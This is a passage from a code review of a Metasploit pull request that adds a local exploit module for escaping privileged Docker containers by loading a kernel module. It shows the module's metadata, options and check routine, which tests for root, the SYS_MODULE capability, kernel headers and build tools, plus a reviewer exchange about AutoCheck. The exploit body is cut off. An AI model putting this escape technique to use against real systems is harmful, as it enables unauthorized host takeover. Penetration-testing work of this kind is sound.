modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb

```diff
@@ -0,0 +1,191 @@
+          'SessionTypes' => ['shell', 'meterpreter'],
+          'DefaultTarget' => 0,
+          'References' => [
+            ['URL', 'https://www.cybereason.com/blog/container-escape-all-you-need-is-cap-capabilities']
+          ],
+          'DisclosureDate' => '2019-07-17', # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
+          'Notes' => {
+            'Stability' => [ CRASH_SAFE ],
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
+          }
+        }
+      )
+    )
+    register_advanced_options([
+      OptString.new('KernelModuleName', [true, 'The name that the kernel module will be called in the system', rand_text_alpha(8)]),
+      OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', "/tmp/.#{rand_text_alpha(4)}"]),
+      OptBool.new('ReloadKernelModule', [false, 'Rebuilds and reloads kernel module if its already loaded in case of repeat runs', false])
+    ])
+  end
+
+  # Check we have all the prerequisites to perform the escape
+  def check
+    # Checking database if host has already been disclosed as a container
+    if active_db? && framework.db.workspace.hosts.where(address: session.session_host)&.first&.virtual_host
+      container_name = framework.db.workspace.hosts.where(address: session.session_host)&.first&.virtual_host
+      if !['docker', 'podman', 'lxc'].include?(container_name)
+        return Exploit::CheckCode::Unsupported('Host does not appear to be container of any kind')
+      end
+    elsif active_db?
+      checkcontainer = framework.post.create('linux/gather/checkcontainer')
+      checkcontainer.datastore['SESSION'] = datastore['SESSION']
+      checkcontainer.run
+    end
+
+    # is root user
+    unless is_root?
+      return Exploit::CheckCode::Safe('Exploit requires root inside container')
+    end
+
+    # Checking if the SYS_MODULE capability is enabled
+    capability_bitmask = read_file('/proc/1/status')[/^CapEff:\s+[0-9a-f]{16}$/][/[0-9a-f]{16}$/].to_i(16)
+    unless capability_bitmask & 0x0000000000010000
+      return Exploit::CheckCode::Safe('SYS_MODULE Capability does not appear to be enabled')
+    end
+
+    # Check if kernel header folders exist
+    unless directory?("/lib/modules/#{kernel_release}/build")
+      return Exploit::CheckCode::Unknown("Kernel headers for this target do not appear to be installed. Attempt to install [gcc, make, linux-headers-#{kernel_release}] then retry check")
+    end
+
+    # Check that our required binaries are installed
+    unless command_exists?('insmod')
+      return Exploit::CheckCode::Unknown('insmod does not appear to be installed.')
+    end
+    unless command_exists?('make')
+      return Exploit::CheckCode::Unknown('make isnt installed on the system.')
+    end
+
+    CheckCode::Appears('Inside Docker container and target appears vulnerable')
+  end
+
+  def exploit
+    check
```

Comment:
If we want this functionality, let's use the AutoCheck mixin instead described here https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#autocheck-mixin
```suggestion
```

Reply:
Autocheck is now being utilized.